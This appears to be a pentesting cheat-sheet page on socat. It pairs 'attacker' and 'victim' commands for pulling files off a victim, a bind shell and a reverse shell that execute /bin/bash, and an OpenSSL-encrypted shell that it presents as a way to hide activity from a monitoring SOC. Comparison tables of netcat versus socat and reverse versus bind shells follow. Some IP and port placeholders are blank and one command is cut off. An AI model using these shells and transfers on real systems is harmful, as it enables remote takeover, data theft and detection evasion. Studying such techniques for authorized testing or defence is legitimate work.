# Socat ### SOCAT

* Connection To a TCP/UDP Port **Attacker** Machine {% code overflow="wrap" fullWidth="false" %} ```bash socat - TCP4:: ``` {% endcode %} **`-`** Stdin

* Listening To a TCP/UDP Port **Victim** Machine ```bash socat TCP4-LISTEN: stdout ```

* Transfer File With Socat **Attacker** Machine ```bash socat TCP4:: file:sec.txt,create ``` * **`socat`**: This is the command itself, which stands for "SOcket CAT". It is a multipurpose relay tool that can create two bidirectional byte streams and transfer data between them. * **`TCP4`**: This specifies the address type and protocol to be used. `TCP4` indicates that the connection will use the IPv4 protocol with TCP. * **<`IP`>**: This is a placeholder for the IP address of the remote host to which you want to connect. * **<`PORT`>**: This is a placeholder for the port number on the remote host to which you want to connect. * **`file.tx`t**: This specifies the second address as a file. The data received from the TCP connection will be written to (or read from) this file. Here, `sec.txt` is the filename. * **`create`**: This option ensures that the file `sec.txt` is created if it does not already exist. Without this option, if the file does not exist, the command would fail.

**Victim** Machine ```bash socat TCP4-LISTEN:,fork file:sec.txt ``` * `socat`: This is the command itself, which stands for "SOcket CAT". It is a utility for data transfer between two bidirectional data streams. * `TCP4-LISTEN:`: This specifies that `socat` should listen for incoming TCP connections on the specified port (replace `` with the actual port number you want to use). * `fork`: This option tells `socat` to fork (***create a new process***) for each incoming connection. This allows `socat` to handle multiple connections simultaneously. * `file:sec.txt`: This specifies that the data received from each connection should be written to the file `sec.txt`.

> **The advantage of `Socat` is that it allows more than one person to connect to the same port at the same time, and the connection is not separated, which is what distinguishes it from `NC`.** {% hint style="info" %} U Cant Use Standard Input | Output And Redirect {% endhint %} #### Victim Machine ``` socat tcp-listen:4444,fork - < sec.txt ```

`-` -> Using Standard Input , After This , Waiting for Input `<` -> Using Redirect Character , Send Content File #### Attacker Machine ``` socat tcp4:192.168.43.1:4444 - > sec.txt ```

`-` -> Using Standard Input , After This , Waiting for Input `>` -> Using Redirect Character , Store In File (Override)\ `>>` -> If U Want Adding Content In File With Old Value

* Socat Bind

**Attacker** Machine ```bash socat -d -d -d - TCP4:: ```

**Victim** Machine ```bash socat -d -d -d tcp4-listen:

* `socat`: The command-line utility for bidirectional data transfer between two independent data channels. * `-d -d -d`: These flags enable different levels of debugging output. Each `-d` increases the verbosity of the debug information. * `tcp4-listen:`: This option tells `socat` to listen for incoming TCP connections on the specified port (``). The `tcp4` part specifies that only IPv4 connections are accepted. * `fork`: This option tells `socat` to fork a new process for each incoming connection. This allows multiple clients to connect simultaneously, each handled by its own process. * `exec:/bin/bash`: This part of the command specifies that when a connection is established, `socat` should execute `/bin/bash`. This effectively provides a shell to the connected client. #### Socat Reverse Shells **Attacker** Machine ```bash socat -d -d -v tcp4-listen: stdout ```

**Victim** Machine ```bash socat -d -d TCP4::,fork exec:/bin/bash ```

### Socat Encrypted Bund Shell

{% hint style="info" %} In normal use of the tool, if there is someone monitoring the communications that occur, if there is a SOC team monitoring everything that happens. It will see exactly what you are doing in terms of commands on the server or to victims inside the network and other things, so you may be easily detected and even know exactly what you were doing. {% endhint %} **Let's see this ,** Using Wireshark : ``` ip.addr == 192.168.43.1 && tcp ```

**Here I use a filter to filter the TCP packets because you will find a lot of connections using more than one different protocol, and this is a normal thing within the network.** **--**

***As you can see, as soon as he typed the ls command, the packet and connections started to appear*** ***--***

Right Click > Follow > TCP Stream
Or
Ctrl + Alt + Shift + T

{% hint style="info" %} If you notice some strange letters, this is because those strange letters have a relationship to the colors that appear in the terminal. Some of them have a relationship to the formats inside the terminal, such as dropping a new line to display the rest of the files, such as the color of the file name and the color of the folders. {% endhint %} As you can see, this is a behavior that is very clear to anyone monitoring what is happening on the network \-- **To hide this, we will encrypt the packet and all communications that occur between us and the other device ,** Using an encryption key we will create * Generate key.pem ```bash openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 ```

`req` ⇒ Indicates that we want to use OpenSSL in **requests** mode, which is used to create or process requests for SSL certificates. `-x509` ⇒ Indicates that we want to create an X.509 certificate, which is a common format for digital certificates. `-newkey rsa:4096` ⇒ OpenSSL says it should generate a new RSA key pair with a length of 4096 bits. The private and public key are generated in this step `-keyout` ⇒ Specifies the name of the file in which the private key will be saved. In this case, the private key will be saved in a file called key.pem `-out` ⇒ Specifies the name of the file in which the public certificate will be saved. In this case, the public certificate will be saved in a file called cert.pem. `-days` ⇒ It determines the validity period of the certificate after its issuance, and here it is set to be valid for one year (365 days). \-- Attacker ```bash socat - openssl::,verify=0 ```

Victim ```bash socat -d -d -v openssl-listen:6666,cert=bind.pem,fork,verify=0 exec:/bin/bash ```

### Wireshark > Data is Encrypted Using openssl

### Socat VS Netcat #### Summary Table | Feature | Netcat (nc) | Socat | | ------------------- | ---------------------- | -------------------------------------- | | Protocol Support | TCP, UDP | TCP, UDP, SCTP, UNIX sockets, and more | | Ease of Use | Simple, easy to use | More complex, steeper learning curve | | Functionality | Basic networking tasks | Advanced networking capabilities | | Port Scanning | Yes | No | | Data Transformation | No | Yes | | Proxying/Relaying | Basic | Advanced | | Debugging | Basic | Detailed | | File Transfer | Yes | Yes | #### Conclusion * **Use `netcat`** for simpler, quick networking tasks such as port scanning, basic data transfer, and simple shell setups. * **Use `socat`** when you need advanced capabilities such as data transformation, complex proxying, and handling multiple types of sockets and protocols. Choose the tool based on the complexity of the task and the level of control you need over the network connections and data streams. ### Reverse shell VS Bind

#### Summary Table | Feature | Reverse Shell | Bind Shell | | ------------------------ | ------------------------------------- | ------------------------------------------- | | **Connection Initiator** | Target | Attacker | | **Firewall/NAT Evasion** | Easier | Harder | | **Setup Complexity** | More complex on target side | Simpler on target side | | **Detection Risk** | Moderate (outbound connection) | Higher (listening port) | | **Use Case** | When outbound connections are allowed | When the attacker can’t receive connections | > #### Conclusion > > * **Reverse Shell** is generally more flexible in bypassing network restrictions. > * **Bind Shell** can be simpler but is more likely to be blocked by network defenses. > * Choose the method based on the network environment and specific constraints you are working with. Always ensure you have authorization and understand the legal implications of using these techniques. > * [**Online Reverse Shell**](https://www.revshells.com/)